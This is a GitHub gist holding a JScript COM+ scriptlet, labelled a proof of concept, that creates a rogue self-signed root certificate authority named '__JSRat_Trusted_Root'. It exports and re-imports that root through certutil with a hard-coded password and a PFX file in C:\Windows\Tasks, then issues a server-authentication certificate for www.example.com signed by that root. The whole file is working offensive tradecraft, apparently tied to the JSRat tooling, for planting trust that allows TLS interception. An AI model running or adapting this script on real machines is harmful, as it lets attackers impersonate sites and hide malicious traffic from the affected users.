Skip to content

Instantly share code, notes, and snippets.

@AV1080p

AV1080p/jscertenroll.sct

Created December 2, 2020 11:00
Show Gist options
  • Save AV1080p/8eb123085be26105dccb35fdd3c38cb6 to your computer and use it in GitHub Desktop.
Save AV1080p/8eb123085be26105dccb35fdd3c38cb6 to your computer and use it in GitHub Desktop.
Download ZIP
JavaScript - Certificate Generate and Enroll - COM+Scriptlet
Raw
jscertenroll.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="JSCertEnroll"
classid="{FFFF1111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD 3-Clause -->
<script language="JScript">
<![CDATA[
function InvokeCreateCertificate(certSubject, isCA)
{
var CAsubject = certSubject;
var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
dn.Encode( "CN=" + CAsubject, 0);
var issuer = "__JSRat_Trusted_Root";
var issuerdn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
issuerdn.Encode("CN=" + issuer, 0);
var key = new ActiveXObject("X509Enrollment.CX509PrivateKey");
key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider";
if(isCA)
{
key.KeySpec = 2 ;
}
else
{
key.KeySpec = 1;
}
key.Length = 1024;
key.MachineContext = 0;
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379412(v=vs.85).aspx
key.ExportPolicy = 11;
key.Create() ;
var serverauthoid = new ActiveXObject("X509Enrollment.CObjectId");
serverauthoid.InitializeFromValue("1.3.6.1.5.5.7.3.1");
var ekuoids = new ActiveXObject("X509Enrollment.CObjectIds.1");
ekuoids.Add(serverauthoid);
var ekuext = new ActiveXObject("X509Enrollment.CX509ExtensionEnhancedKeyUsage");
ekuext.InitializeEncode(ekuoids);
var cert = new ActiveXObject("X509Enrollment.CX509CertificateRequestCertificate");
cert.InitializeFromPrivateKey(1, key, "");
cert.Subject = dn;
cert.Issuer = issuerdn;
cert.NotBefore = "12/31/2014";
cert.NotAfter = "12/31/2025";
var hashAlgorithmObject = new ActiveXObject("X509Enrollment.CObjectId");
hashAlgorithmObject.InitializeFromAlgorithmName(1,0,0,"SHA256");
cert.HashAlgorithm = hashAlgorithmObject;
cert.X509Extensions.Add(ekuext)
if (isCA)
{
var basicConst = new ActiveXObject("X509Enrollment.CX509ExtensionBasicConstraints");
basicConst.InitializeEncode("true", 1);
cert.X509Extensions.Add(basicConst);
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
enrollment.InstallResponse(2, certdata, 0, "");
var oShell = new ActiveXObject("WScript.Shell");
var oExec = oShell.Exec('certutil -store -user MY __JSRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var oExec = oShell.Exec('certutil -exportPFX -p password -user My '+ serial +' C:\\Windows\\Tasks\\cert.pfx');
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > 5000){
break;
}
}
var oExec = oShell.Exec('certutil -f -p password -user -importpfx C:\\Windows\\Tasks\\cert.pfx');
}
else
{
var oShell = new ActiveXObject("WScript.Shell");
var oExec = oShell.Exec('certutil -store -user MY __JSRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var signerCertificate = new ActiveXObject("X509Enrollment.CSignerCertificate");
signerCertificate.Initialize(0,0,4, serial)
cert.SignerCertificate = signerCertificate
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
enrollment.InstallResponse(2, certdata, 0, "");
}
}
InvokeCreateCertificate("__JSRat_Trusted_Root", true);
InvokeCreateCertificate("www.example.com", false);
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment